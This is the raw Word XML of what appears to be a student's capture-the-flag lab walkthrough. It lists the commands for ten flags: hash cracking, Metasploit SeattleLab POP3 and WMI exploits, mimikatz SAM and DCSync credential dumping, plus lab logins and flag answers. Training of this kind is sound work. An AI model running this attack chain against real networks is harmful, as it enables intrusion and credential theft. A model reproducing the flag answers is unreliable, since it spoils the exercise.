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9C897" w14:textId="4BC45A9C" w:rsidR="00C24DFE" w:rsidRDefault="00133519">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NESSUS LOGIN: ROOT ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4EB76" w14:textId="451CAB67" w:rsidR="00133519" w:rsidRDefault="00E32306">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctf-3.azurewebsites.net: timp98 timothy1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E862B6" w14:textId="77777777" w:rsidR="00E32306" w:rsidRDefault="00E32306">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F75CF4" w14:textId="564CDDD9" w:rsidR="00E32306" w:rsidRDefault="00E32306">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7A99E" w14:textId="6ECBA84F" w:rsidR="00E32306" w:rsidRDefault="00616484" w:rsidP="00E32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SEARCH BAR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604D89D" w14:textId="75A251E7" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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GITHUB.COM/TOTALREKALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D0413" w14:textId="40AC9B12" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="0061648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SITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5DA08" w14:textId="3787285E" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="0061648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XAMPP.USERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753C1F1" w14:textId="6829E762" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="0061648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COPY FULL CONTENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E7A23" w14:textId="361FEB9D" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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TERMINAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EABCC" w14:textId="60DB657D" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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NANO HASH1.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD160C6" w14:textId="251DE150" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="0061648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PASTE CONTENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659872B" w14:textId="2C4A9288" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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JOHN HASH1.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4294C" w14:textId="2BAD5A48" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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FLAG 1: Tanya4life</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D55EC" w14:textId="750C47E2" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="00616484">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732E8F9A" w14:textId="61F7E9FA" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="00616484">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8059E" w14:textId="3C2E4779" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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TERMINAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678C78B" w14:textId="45D5C8A6" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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NMAP -SV 172.22.117.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F601E" w14:textId="2C98F058" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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WINDOWS 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024932D8" w14:textId="78828A01" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="0061648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172.22.117.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D83C4" w14:textId="67335616" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="006164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BROWSER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A88D9" w14:textId="786AF88F" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A138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172.22.117.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE8A20" w14:textId="79301201" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A138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LOGIN TO: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FA43D" w14:textId="0B1C32DA" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A138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Trivera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353682B" w14:textId="021D724C" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A138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Tanya4life</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF9F67" w14:textId="53EA5613" w:rsidR="005A1384" w:rsidRPr="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A138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Flag file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53564E66" w14:textId="5FF4EA72" w:rsidR="00616484" w:rsidRDefault="00616484" w:rsidP="006164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FLAG 2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3058F" w14:textId="7B2DD173" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A1384">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C914E7" w14:textId="1C336D63" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A1384">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF8359E" w14:textId="14104197" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A13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TERMINAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB10603" w14:textId="0EDEA5E2" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A1384">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="000A7B27">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FTP 172.22.117.20</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2287D8BD" w14:textId="59D7F8A1" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A13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USER: ANONYMOUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A23DC" w14:textId="0F2901AE" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="005A13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PASS: ANONYMOUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33322DE1" w14:textId="6CA4099D" w:rsidR="005A1384" w:rsidRDefault="005A1384" w:rsidP="00193EF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LS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C11AB91" w14:textId="49418B37" w:rsidR="005A1384" w:rsidRDefault="00193EFC" w:rsidP="00193EF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GET FLAG 3.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB96417" w14:textId="332B3762" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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EXIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF87216" w14:textId="52529658" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193E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CAT FLAG 3.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FDAB8" w14:textId="3AA5C8A3" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193E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FLAG 3: 89cb548970d44f348bb63622353ae278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050EDA3A" w14:textId="545440B5" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EFC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FLAG 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F435039" w14:textId="0C9582D0" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193E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TERMINAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC82F11" w14:textId="65736510" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193E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MSFCONSOLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8F18E" w14:textId="4F735D36" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193E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SEARCH SLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CBB224" w14:textId="175F0479" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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USE EXPLOIT/WINDOWS/POP3/SEATTLELAB_PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333B66CE" w14:textId="6C117A82" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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SET RHOSTS 172.22.117.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595BE4A" w14:textId="4D3B8DEF" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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SET LHOST 172.22.117.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C0DBF3" w14:textId="6AAA10A0" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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RUN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194CABFC" w14:textId="17FD6D84" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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LS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705F2177" w14:textId="3626B568" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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CAT FLAG4.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A30ED" w14:textId="1470EEEC" w:rsidR="00193EFC" w:rsidRDefault="00193EFC" w:rsidP="00193EF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FLAG 4: 822e3434a10440ad9cc0861978197819b49d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8AA2C9" w14:textId="4F18555C" w:rsidR="00677789" w:rsidRDefault="00677789" w:rsidP="00677789">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738F8289" w14:textId="15EC955E" w:rsidR="00677789" w:rsidRDefault="00677789" w:rsidP="00677789">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302AFF61" w14:textId="3A7C34F1" w:rsidR="00677789" w:rsidRDefault="00677789" w:rsidP="006777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CONTINUE FROM FLAG 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07D6F8" w14:textId="044AD5CB" w:rsidR="00677789" w:rsidRDefault="00677789" w:rsidP="006777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SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F87E6C" w14:textId="547506FD" w:rsidR="00677789" w:rsidRDefault="00677789" w:rsidP="0067778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SCHTASKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899F546" w14:textId="269BC80B" w:rsidR="00677789" w:rsidRDefault="00677789" w:rsidP="0067778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VERY FIRST TASKS: FLAG 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41560DAF" w14:textId="7E867E2E" w:rsidR="00677789" w:rsidRDefault="006A7C7D" w:rsidP="0067778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SCHTASKS </w:t>
      </w:r>
      <w:r w:rsidR="00EA4702">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/query /TN flag5 /fo list /v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22D55E" w14:textId="43C9ADA5" w:rsidR="006A7C7D" w:rsidRDefault="00EA4702" w:rsidP="0067778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FLAG 5: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B177C11" w14:textId="61F04749" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59EB9E20" w14:textId="6707E504" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E9C76F" w14:textId="55BC1A38" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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CONTINUE FROM FLAG 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46C996" w14:textId="38AE726C" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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LOAD KIWI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17687A7E" w14:textId="3A4B423E" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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Lsa_dump_sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74392973" w14:textId="767D2526" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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Flag 6 user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A072601" w14:textId="39AE0072" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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COPY AND PASTE INTO HASH2.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353EE6D" w14:textId="107F2D9B" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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JOHN –FORMAT=NT HASH2.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05401D" w14:textId="180C0D30" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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FLAG 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2162AACE" w14:textId="4345AEAA" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634A8660" w14:textId="3D11E9D1" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7343C1B4" w14:textId="4E1EC27B" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17C5BF" w14:textId="01F43B13" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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FROM METERPRETER SHELL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B04D2" w14:textId="2968A85B" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F6428" w14:textId="7816AFD1" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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CD /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963DF36" w14:textId="24ADA728" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6F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CD USERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F27057" w14:textId="4B46EA1D" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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CD PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A902862" w14:textId="2FF78557" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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CD DOCUMENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C31A72" w14:textId="3828252F" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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CAT FLAG7.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77274833" w14:textId="0A702E05" w:rsidR="003A6FE4" w:rsidRDefault="003A6FE4" w:rsidP="003A6FE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FLAG 7: </w:t>
      </w:r>
      <w:r w:rsidR="00B235FC" w:rsidRPr="00B235FC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6fd73e3a2c2740328d57ef32557c2fdc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA21EE1" w14:textId="0CE8AB2E" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F119B7B" w14:textId="10AAC741" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAB26D" w14:textId="5635A664" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235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BACKGROUND METERPRETER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D39BF" w14:textId="69EF27DB" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235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EXPLOIT/WINDOWS/LOCAL/WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8E3D0" w14:textId="2A3BCFF0" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235F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SET SMBDOMAIN TOTALREKALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4F3FE" w14:textId="3543C04A" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235F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SET SMBUSER ADMBOB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03349A8C" w14:textId="0DCB8C40" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235F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SET SMBPASS CHANGEME!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D03124" w14:textId="31204928" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235F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SET RHOSTS 172.22.117.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA341AF" w14:textId="65003D54" w:rsidR="00B235FC" w:rsidRDefault="00B235FC" w:rsidP="00B235F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SET LHOST 172.22.117.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DA365" w14:textId="5962DA6F" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="00B235F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RUN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062C7B7" w14:textId="1DF962A2" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7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Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1081D5B5" w14:textId="24F26E04" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7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Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C2946" w14:textId="42CB41B0" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7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Net users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3E1CB" w14:textId="6F5F10AB" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7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FLAG 8: ad12fc2ffc1e47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F50C8" w14:textId="4463F523" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C020E6" w14:textId="4D589EEB" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD57137" w14:textId="1718830A" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B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CONTINUE FROM 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2267D7D3" w14:textId="2C0074CF" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B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CD /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288DE13F" w14:textId="3D1FCF59" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B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LS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08626473" w14:textId="299537D2" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B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CAT FLAG 9.TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B43D6" w14:textId="4509CD92" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B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FLAG 9: f7356e02f44c4fe7bf5374ff9bcbf872</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420227F" w14:textId="15821597" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A82FF13" w14:textId="2EC52CCD" w:rsidR="007B3B7D" w:rsidRDefault="007B3B7D" w:rsidP="007B3B7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAG 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D548026" w14:textId="1065A64C" w:rsidR="007B3B7D" w:rsidRDefault="0052786E" w:rsidP="007B3B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WHILE INSIDE WINDC01:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A96191" w14:textId="18E01BBB" w:rsidR="0052786E" w:rsidRDefault="0052786E" w:rsidP="0052786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DCSYNC_NTLM ADMINISTRATOR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68948B2E" w14:textId="75B6EF9A" w:rsidR="0052786E" w:rsidRPr="007B3B7D" w:rsidRDefault="0052786E" w:rsidP="0052786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FLAG 10: NTLM HASH = 4f0cfd309a1965906fd2ec39dd23d582</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0052786E" w:rsidRPr="007B3B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50C46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99A624A4"/>
    <w:lvl w:ilvl="0" w:tplc="B7B8C7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742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EF"/>
    <w:rsid w:val="00133519"/>
    <w:rsid w:val="00193EFC"/>
    <w:rsid w:val="002B071A"/>
    <w:rsid w:val="002C6384"/>
    <w:rsid w:val="003A6FE4"/>
    <w:rsid w:val="004E2148"/>
    <w:rsid w:val="0052786E"/>
    <w:rsid w:val="005A1384"/>
    <w:rsid w:val="00616484"/>
    <w:rsid w:val="00677789"/>
    <w:rsid w:val="006A7C7D"/>
    <w:rsid w:val="007B3B7D"/>
    <w:rsid w:val="00B235FC"/>
    <w:rsid w:val="00C24DFE"/>
    <w:rsid w:val="00E32306"/>
    <w:rsid w:val="00EA4702"/>
    <w:rsid w:val="00F9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00CC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{78ACCD2F-B01B-43A2-AA8F-E85415ED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3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4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4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Pang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tim Pang</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-24T23:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-25T01:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>